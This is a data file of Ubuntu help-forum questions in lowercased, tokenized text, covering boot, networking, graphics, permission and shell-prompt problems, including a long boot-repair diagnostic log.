422887	ubuntu took my windows username , kindof	i used a program that will put an iso on a usb stick . so thats what i did with ubuntu . i installed it through windows onto another drive . when doing it this way , its asks for you to give ubuntu a username and password . i gave a different username than windows to ubuntu . when i booted into ubuntu , the main screen displays my windows name , but takes my new user password ( i dont have a password on the windows account ) . the windows name is titan , the ubuntu name is dwarf . so i tried usermod -l titan dwarf and it says dwarf is logged in . so where is that display name of titan on the ubuntu login screen coming from , why , and what can i do to remove it ? any help would be awesome
422890	slow nfs over gigabit on kubuntu 13.10	im experiencing a slow connection ... firs , i can confirm the network is well mounted , iperfs give me 900 mbits in transfer rate and i get some times 60 mbps in samba , low but more than nfs , ironically what made me test nfs ... i tried a lot of things ... tried with async sync , many rsizes and w sisez values , from 8kb to 16.. 64 ... 1mb ... nothing ... still i get 6 mbps ... i have blacklisted kerberos module to test it is not involved because of nfs no security setting bug ons 14.04 ... have even tested it in localhost where speed is brutally different ... i tested with nautilus to exclude kioslave problems ... im without ideas ...
422891	can not boot from usb - hp envy	i 'm having a little bit of a problem right now ... i am trying to install ubuntu , whether it be the 12.04lts or 13.10 , but i ca n't seem to get my pc to even run into my bootable usb . i am trying to at least boot into ubuntu off the usb so i can see if the network card will work and be able to grab wifi . when i open my boot source when i start my pc , i can click on the usb drive , but it will tell me that it can not authenticate it ( paraphrasing loosely of course ) . i 'm using an hp envy ts m6 sleekbook with windows 8 ( 64-bit ) . i would definitely appreciate someone 's help , so if ubuntu is compatible with my network card , i can learn more about ubuntu and such . thank you in advance . -kirk specs : os : windows 8 64-bit cpu : amd a10 @ 2.10ghz ram : 6gb graphics : ati radeon hd 8610g hdd : 698gb seagate ( sata )
422892	apt-cacher-ng + aws elb ; 503 dns error for hostname downloads : name or service not known	i have a apt-cacher-ng box running behind a aws elastic load balancer ( ubuntu 13.04 ) . on the client side i have the following in /etc/apt/apt.conf : acquire : :http { proxy `` http : //aptcacher.xxx.com '' ; } ; with this configuration when i do a apt-get update on client i get several 503s err http : //www.serverdensity.com all/main amd64 packages 503 dns error for hostname downloads : name or service not known . if downloads refers to a configured cache repository , please check the corresponding configuration file . w : failed to fetch http : //www.serverdensity.com/downloads/linux/deb/dists/all/main/binary-amd64/packages 503 dns error for hostname downloads : name or service not known . if downloads refers to a configured cache repository , please check the corresponding configuration file . w : failed to fetch http : //ppa.launchpad.net/saltstack/salt/ubuntu/dists/raring/main/binary-amd64/packages 503 dns error for hostname saltstack : name or service not known . if saltstack refers to a configured cache repository , please check the corresponding configuration file . when i change the apt.conf to talk to the box running apt-cacher-ng directly ( skipping aws elb ) none of these 503s are seen . can any one please suggest how to handle this issue .
422893	optimus - still does n't work ?	i was using ubuntu 12.04 with bumblebee for a while . since i 've bought an ssd , i 've decided to install windows 8 and ubuntu 13.10 . now , afair ubuntu 13.10 has 3.11 . * kernel . i read , that with some version of the 3.12 kernel nvidia optimus graphics is finally supported - it can be switched off to save battery life automatically . so i decided to upgrade the linux kernel in my ubuntu . at this moment , i have 3.13.2-031302-generic . so optimus graphics should right now work out of the box , right ? the thing is , it 's not . my laptop ( asus k53sv ) is still overheating , so obviously nvidia gt 540m is on . should i do something after upgrading kernel to make it work ? edit i read this page : http : //nouveau.freedesktop.org/wiki/optimus/ when i type : cat /sys/kernel/debug/vgaswitcheroo/switch it turns out that my discrete card has status dynpwr all the time , instead of dynoff . why is that ?
422896	intel cpu turbo boost pegged at its clock-speed sometimes	i have a ubuntu 12.04 lts server running at 2 intel xeon e5-2620v2 processors . at busy time the turbo boost will work : ( monitor with turbostat i get : ) pk cor cpu % c0 ghz tsc smi % c1 % c3 % c6 % c7 ctmp ptmp % pc2 % pc3 % pc6 % pc7 pkg_w cor_w ram_w pkg_ % ram_ % 86.04 2.25 2.10 0 13.00 0.18 0.78 0.00 65 65 0.00 0.00 0.00 0.00 70.16 44.67 12.27 0.00 0.00 0 0 0 90.06 2.40 2.10 0 9.94 0.00 0.00 0.00 61 62 0.00 0.00 0.00 0.00 37.60 24.81 6.65 0.00 0.00 0 0 12 95.81 2.40 2.10 0 4.19 0 1 1 86.58 2.40 2.10 0 12.77 0.16 0.49 0.00 58 0 1 13 84.33 2.40 2.10 0 15.02 0 2 2 86.17 2.40 2.10 0 12.91 0.21 0.70 0.00 57 0 2 14 82.83 2.40 2.10 0 16.25 0 3 3 86.54 2.40 2.10 0 12.35 0.14 0.97 0.00 62 0 3 15 85.89 2.40 2.10 0 13.00 0 4 4 84.26 2.40 2.10 0 14.97 0.31 0.47 0.00 62 0 4 16 85.31 2.40 2.10 0 13.91 0 5 5 85.75 2.40 2.10 0 13.36 0.10 0.79 0.00 55 0 5 17 84.65 2.40 2.10 0 14.46 1 0 6 85.73 2.10 2.10 0 13.14 0.25 0.87 0.00 64 65 0.00 0.00 0.00 0.00 32.55 19.86 5.62 0.00 0.00 1 0 18 84.96 2.10 2.10 0 13.91 1 1 7 85.13 2.10 2.10 0 13.67 0.24 0.96 0.00 65 1 1 19 85.62 2.10 2.10 0 13.18 1 2 8 86.23 2.10 2.10 0 12.22 0.30 1.25 0.00 63 1 2 20 85.05 2.10 2.10 0 13.40 1 3 9 87.43 2.10 2.10 0 11.46 0.14 0.97 0.00 60 1 3 21 84.09 2.10 2.10 0 14.80 1 4 10 84.61 2.10 2.10 0 14.19 0.13 1.07 0.00 58 1 4 22 86.24 2.10 2.10 0 12.55 1 5 11 84.93 2.10 2.10 0 14.11 0.16 0.80 0.00 60 1 5 23 86.67 2.10 2.10 0 12.37 as you can see the pkg 0 all 12 cpus turbo frequency to 2.4g . but i also find at busy time cpu pegged and my application get worst performance . pk cor cpu % c0 ghz tsc smi % c1 % c3 % c6 % c7 ctmp ptmp % pc2 % pc3 % pc6 % pc7 pkg_w cor_w ram_w pkg_ % ram_ % 81.56 2.10 2.10 0 17.54 0.15 0.75 0.00 64 64 0.02 0.00 0.00 0.00 63.74 38.62 10.50 0.00 0.00 0 0 0 88.05 2.10 2.10 0 11.95 0.00 0.00 0.00 56 57 0.00 0.00 0.00 0.00 32.16 19.50 6.24 0.00 0.00 0 0 12 96.44 2.10 2.10 0 3.56 0 1 1 82.42 2.10 2.10 0 16.89 0.15 0.55 0.00 54 0 1 13 82.60 2.10 2.10 0 16.70 0 2 2 84.48 2.10 2.10 0 15.04 0.11 0.37 0.00 51 0 2 14 81.57 2.10 2.10 0 17.94 0 3 3 83.53 2.10 2.10 0 15.61 0.13 0.72 0.00 54 0 3 15 82.76 2.10 2.10 0 16.38 0 4 4 84.55 2.10 2.10 0 14.80 0.12 0.53 0.00 57 0 4 16 81.77 2.10 2.10 0 17.58 0 5 5 82.58 2.10 2.10 0 16.97 0.03 0.41 0.00 51 0 5 17 80.30 2.10 2.10 0 19.25 1 0 6 77.37 2.10 2.10 0 21.37 0.30 0.96 0.00 60 64 0.03 0.00 0.00 0.00 31.58 19.12 4.26 0.00 0.00 1 0 18 78.15 2.10 2.10 0 20.60 1 1 7 78.57 2.10 2.10 0 20.11 0.21 1.11 0.00 64 1 1 19 77.48 2.10 2.10 0 21.19 1 2 8 80.80 2.10 2.10 0 17.75 0.20 1.26 0.00 60 1 2 20 78.09 2.10 2.10 0 20.45 1 3 9 77.46 2.10 2.10 0 21.31 0.27 0.97 0.00 57 1 3 21 77.07 2.10 2.10 0 21.70 1 4 10 81.03 2.10 2.10 0 17.64 0.13 1.20 0.00 57 1 4 22 80.29 2.10 2.10 0 18.38 1 5 11 81.34 2.10 2.10 0 17.56 0.17 0.93 0.00 59 1 5 23 78.70 2.10 2.10 0 20.20 as you can see pkg 0 and 1 all 24 cpus pegged at 2.1g at this time i do not noticed high temperature nor high watt . are there any suggestion ?
422898	boots and sits at grub rescue	to reinstall grub : tried the below first . to add boot-repair to the repository sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair once installation completes , run boot-repair on terminal by typing the following command or select it by system → administration → boot repair . boot-repair i just tried the above but it still went to back to the prompt grub rescue . i have booted the machine with the live cd and used terminal to unmount the drive then remount it , tried to reinstall grub 2 . no change . it all started when i did the daily update of ubuntu . it asked me to reboot and it went to grub rescue . my main problem is that there is no other operating system on the laptop . i tried to install mint over it but it failed , tried a repair install , failed . at this i 've working at it for at least 24hrs straight . i 'm fed up with it . any suggestion would be gratefully appreciated . boot info script e7fc706 + boot-repair extra info [ boot-info 23dec2013 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 94 for . sda1 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.10 boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/i386-pc/core.img sda2 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes partition boot start sector end sector # of sectors id system /dev/sda1 * 2,048 970,498,047 970,496,000 83 linux /dev/sda2 970,500,094 976,771,071 6,270,978 5 extended /dev/sda5 970,500,096 976,771,071 6,270,976 82 linux swap / solaris '' blkid '' output : ________________________________________________________________ device uuid type label /dev/loop0 squashfs /dev/sda1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 ext4 /dev/sda5 6ea1bfcc-32d4-4dd7-933f-2212b03fc6a7 swap /dev/sr0 iso9660 ubuntu-gnome 13.10 i386 ================================ mount points : ================================= device mount_point type options /dev/loop0 /rofs squashfs ( ro , noatime ) /dev/sr0 /cdrom iso9660 ( ro , noatime ) =========================== sda1/boot/grub/grub.cfg : =========================== -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ x '' $ { feature_menuentry_id } '' = xy ] ; then menuentry_id_option= '' -- id '' else menuentry_id_option= '' '' fi export menuentry_id_option if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { if [ x $ feature_all_video_module = xy ] ; then insmod all_video else insmod efi_gop insmod efi_uga insmod ieee1275_fb insmod vbe insmod vga insmod video_bochs insmod video_cirrus fi } if [ x $ feature_default_font_path = xy ] ; then font=unicode else insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi font= '' /usr/share/grub/unicode.pf2 '' fi if loadfont $ font ; then set gfxmode=auto load_video insmod gfxterm set locale_dir= $ prefix/locale set lang=en_us insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=10 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 45,51,53 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ { 1 } '' if [ `` $ { 1 } '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ `` $ { recordfail } '' ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode menuentry 'ubuntu ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-simple-1d5bd5d8-4e90-43ae-95cf-91e881c25001 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi linux /boot/vmlinuz-3.11.0-12-generic root=uuid=1d5bd5d8-4e90-43ae-95cf-91e881c25001 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.11.0-12-generic } submenu 'advanced options for ubuntu ' $ menuentry_id_option 'gnulinux-advanced-1d5bd5d8-4e90-43ae-95cf-91e881c25001 ' { menuentry 'ubuntu , with linux 3.11.0-12-generic ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-advanced-1d5bd5d8-4e90-43ae-95cf-91e881c25001 ' { recordfail load_video gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=1d5bd5d8-4e90-43ae-95cf-91e881c25001 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } menuentry 'ubuntu , with linux 3.11.0-12-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.11.0-12-generic-recovery-1d5bd5d8-4e90-43ae-95cf-91e881c25001 ' { recordfail load_video insmod gzio insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi echo 'loading linux 3.11.0-12-generic ... ' linux /boot/vmlinuz-3.11.0-12-generic root=uuid=1d5bd5d8-4e90-43ae-95cf-91e881c25001 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.11.0-12-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry 'memory test ( memtest86+ ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi linux16 /boot/memtest86+.bin } menuentry 'memory test ( memtest86+ , serial console 115200 ) ' { insmod part_msdos insmod ext2 set root='hd0 , msdos1' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , msdos1 -- hint-efi=hd0 , msdos1 -- hint-baremetal=ahci0 , msdos1 1d5bd5d8-4e90-43ae-95cf-91e881c25001 else search -- no-floppy -- fs-uuid -- set=root 1d5bd5d8-4e90-43ae-95cf-91e881c25001 fi linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda1/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=1d5bd5d8-4e90-43ae-95cf-91e881c25001 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=6ea1bfcc-32d4-4dd7-933f-2212b03fc6a7 none swap sw 0 0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda1 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) =============================== stderr messages : =============================== cat : /tmp/bootinfo-ajqfgocr/tmp_log : no such file or directory file descriptor 9 ( /proc/5945/mounts ) leaked on lvscan invocation . parent pid 13205 : bash no volume groups found additional information : =================== log of boot-repair 2014-02-18__23h59 =================== boot-repair version : 3.199~ppa40~saucy boot-sav version : 3.199~ppa40~saucy glade2script version : 3.2.2~ppa47~saucy boot-sav-extra version : 3.199~ppa40~saucy boot-repair is executed in live-session ( ubuntu 13.10 , saucy , ubuntu , i686 ) ls : can not access /home/usr/.config : no such file or directory cpu op-mode ( s ) : 32-bit file=/cdrom/preseed/ubuntu-gnome.seed boot=casper initrd=/casper/initrd.lz quiet splash -- maybe-ubiquity =================== os-prober : /dev/sda1 : ubuntu 13.10 ( 13.10 ) : ubuntu : linux =================== blkid : /dev/loop0 : type= '' squashfs '' /dev/sr0 : label= '' ubuntu-gnome 13.10 i386 '' type= '' iso9660 '' /dev/sda1 : uuid= '' 1d5bd5d8-4e90-43ae-95cf-91e881c25001 '' type= '' ext4 '' /dev/sda5 : uuid= '' 6ea1bfcc-32d4-4dd7-933f-2212b03fc6a7 '' type= '' swap '' 1 disks with os , 1 os : 1 linux , 0 macos , 0 windows , 0 unknown type os . warning : extended partition does not start at a cylinder boundary . dos and linux will interpret the contents differently . =================== sda1/etc/grub.d/ : drwxr-xr-x 2 root root 4096 oct 17 00:52 grub.d total 72 -rwxr-xr-x 1 root root 7850 oct 10 17:53 00_header -rwxr-xr-x 1 root root 5949 aug 15 2013 05_debian_theme -rwxr-xr-x 1 root root 11479 oct 10 17:53 10_linux -rwxr-xr-x 1 root root 10258 oct 10 17:53 20_linux_xen -rwxr-xr-x 1 root root 1798 jun 17 2013 20_memtest86+ -rwxr-xr-x 1 root root 11531 oct 10 17:53 30_os-prober -rwxr-xr-x 1 root root 1426 oct 10 17:53 30_uefi-firmware -rwxr-xr-x 1 root root 214 oct 10 17:53 40_custom -rwxr-xr-x 1 root root 216 oct 10 17:53 41_custom -rw-r -- r -- 1 root root 483 oct 10 17:53 readme =================== sda1/etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' =================== uefi/legacy mode : this live-session is not efi-compatible . secureboot maybe enabled . =================== partitions & disks : sda1 : sda , not-sepboot , grubenv-ok grub2 , grub-pc , update-grub , 32 , with-boot , is-os , not -- efi -- part , fstab-without-boot , fstab-without-efi , no-nt , no-winload , no-recov-nor-hid , no-bmgr , notwinboot , apt-get , grub-install , with -- usr , fstab-without-usr , not-sep-usr , standard , farbios , /mnt/boot-sav/sda1 . sda : not-gpt , biosboot-not-needed , has-no-efipart , not-usb , has-os , 2048 sectors * 512 bytes =================== parted -l : model : ata st9500420asg ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 497gb 497gb primary ext4 boot 2 497gb 500gb 3211mb extended 5 497gb 500gb 3211mb logical linux-swap ( v1 ) model : matshita dvd-ram uj-840s ( scsi ) disk /dev/sr0 : 4700mb sector size ( logical/physical ) : 2048b/2048b partition table : msdos number start end size type file system flags 1 131kb 3674mb 3674mb primary boot , hidden =================== parted -lm : byt ; /dev/sda:500gb : scsi:512:512 : msdos : ata st9500420asg ; 1:1049kb:497gb:497gb : ext4 : :boot ; 2:497gb:500gb:3211mb : : : ; 5:497gb:500gb:3211mb : linux-swap ( v1 ) : : ; byt ; /dev/sr0:4700mb : scsi:2048:2048 : msdos : matshita dvd-ram uj-840s ; 1:131kb:3674mb:3674mb : : : boot , hidden ; =================== mount : /cow on / type overlayfs ( rw ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) /dev/sr0 on /cdrom type iso9660 ( ro , noatime ) /dev/loop0 on /rofs type squashfs ( ro , noatime ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) tmpfs on /tmp type tmpfs ( rw , nosuid , nodev ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/999/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ubuntu-gnome ) /dev/sda1 on /mnt/boot-sav/sda1 type ext4 ( rw ) =================== ls : /sys/block/sda ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro sda1 sda2 sda5 size slaves stat subsystem trace uevent /sys/block/sr0 ( filtered ) : alignment_offset bdi capability dev device discard_alignment events events_async events_poll_msecs ext_range holders inflight power queue range removable ro size slaves stat subsystem trace uevent /dev ( filtered ) : agpgart autofs block bsg btrfs-control bus cdrom char console core cpu cpu_dma_latency disk dri ecryptfs fb0 fd full fuse fw0 hpet input kmsg log lp0 mapper mcelog mem net network_latency network_throughput null parport0 port ppp psaux ptmx pts random rfkill rtc rtc0 sda sda1 sda2 sda5 sg0 sg1 shm snapshot snd sr0 stderr stdin stdout tpm0 uinput urandom vga_arbiter vhost-net zero ls /dev/mapper : control =================== df -th : filesystem type size used avail use % mounted on /cow overlayfs 1.5g 188m 1.3g 13 % / udev devtmpfs 1.5g 12k 1.5g 1 % /dev tmpfs tmpfs 303m 1.1m 302m 1 % /run /dev/sr0 iso9660 876m 876m 0 100 % /cdrom /dev/loop0 squashfs 843m 843m 0 100 % /rofs none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup tmpfs tmpfs 1.5g 28k 1.5g 1 % /tmp none tmpfs 5.0m 4.0k 5.0m 1 % /run/lock none tmpfs 1.5g 84k 1.5g 1 % /run/shm none tmpfs 100m 28k 100m 1 % /run/user /dev/sda1 ext4 456g 3.1g 430g 1 % /mnt/boot-sav/sda1 =================== fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00036ad0 device boot start end blocks id system /dev/sda1 * 2048 970498047 485248000 83 linux /dev/sda2 970500094 976771071 3135489 5 extended /dev/sda5 970500096 976771071 3135488 82 linux swap / solaris =================== recommended repair recommended-repair this setting will reinstall the grub2 of sda1 into the mbr of sda . additional repair will be performed : unhide-bootmenu-10s unhide grub boot menu in sda1/etc/default/grub *******lspci -nnk | grep -ia3 vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller [ 8086:27a2 ] ( rev 03 ) subsystem : hewlett-packard company device [ 103c:30aa ] kernel driver in use : i915 00:02.1 display controller [ 0380 ] : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller [ 8086:27a6 ] ( rev 03 ) ******* grub-install ( grub ) 2.00-19ubuntu2 , grub-install ( grub ) 2 . reinstall the grub of sda1 into the mbr of sda installation finished . no error reported . grub-install /dev/sda : exit code of grub-install /dev/sda:0 chroot /mnt/boot-sav/sda1 update-grub generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-12-generic found initrd image : /boot/initrd.img-3.11.0-12-generic found memtest86+ image : /boot/memtest86+.bin unhide grub boot menu in sda1/boot/grub/grub.cfg boot successfully repaired .
422900	folder permissions keep reverting back and wo n't keep changes	i am trying to change permissions on one of my folders where my website is being ran from for apache , and i am using a small game framework called impactjs , the tile editor for this requires php i believe , and because i am not able to read/write to the said folder the tile creator is not functioning correctly . everytime i navigate to the folder using the gui to change the folder permissions they automatically revert back to what they originally were within seconds , this folder is in my user folder , i have even tried changing the permissions as gsku nautilus , same thing happens . any help would be great , i will say this issue with the tile creator didnt appear until just a few minutes ago . it was originally working .
422903	restore clonezilla image on another pc ( ubuntu 12.04 )	i use a old hp 5800 pc for installation of openfire server on ubuntu server 12.04 . for backup , i clone whole hdd . may i know what should be procedure for restoring the image on another pc . or it 's better i install the new pc on fresh and then only restore openfire folders .
422904	how to close all wifi password message windows at once ?	i keep my computer on at night . during this time the router stops and starts multiple times . i have checked connect automatically to the connection . when i see the computer in the morning , i have the wireless connected but there are lots of message windows with title wireless network authentication required . i did ps -e but could n't figure out which process are all those windows linked with . how do i close all these messages at once using some sort of kill command ?
422909	how to correctly store setings	i have made my .bashrc give me two types of prompts ; longp : xanth @ x-vboxtux : ~➤➤➤ and shortp : ➤ i have done this by writing a 0 or a 1 to a file and then to determine what prompt should be shown an if else tree is in the ps1 line . so my question is ... is there a better way to store a state than writing a 0 or a 1 to a file ? code ; bashrcpl= $ ( < .bashrcpl ) if [ $ bashrcpl = `` 0 '' ] || [ `` $ ( whoami ) '' = root ] ; then if [ `` $ color_prompt '' = yes ] ; then if [ `` $ ( whoami ) '' = root ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 0 ; 31m\ ] \u\ [ \033 [ 0 ; 32m\ ] @ \ [ \033 [ 0 ; 36m\ ] \h\ [ \033 [ 0 ; 32m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 0 ; 31m\ ] ➤\ [ \033 [ 1 ; 31m\ ] ➤\ [ \033 [ 0 ; 32m\ ] ➤\ [ \033 [ 01 ; 34m\ ] ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 1 ; 31m\ ] \u\ [ \033 [ 0 ; 32m\ ] @ \ [ \033 [ 0 ; 36m\ ] \h\ [ \033 [ 0 ; 32m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 0 ; 31m\ ] ➤\ [ \033 [ 1 ; 31m\ ] ➤\ [ \033 [ 0 ; 32m\ ] ➤\ [ \033 [ 01 ; 34m\ ] ' fi else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi else 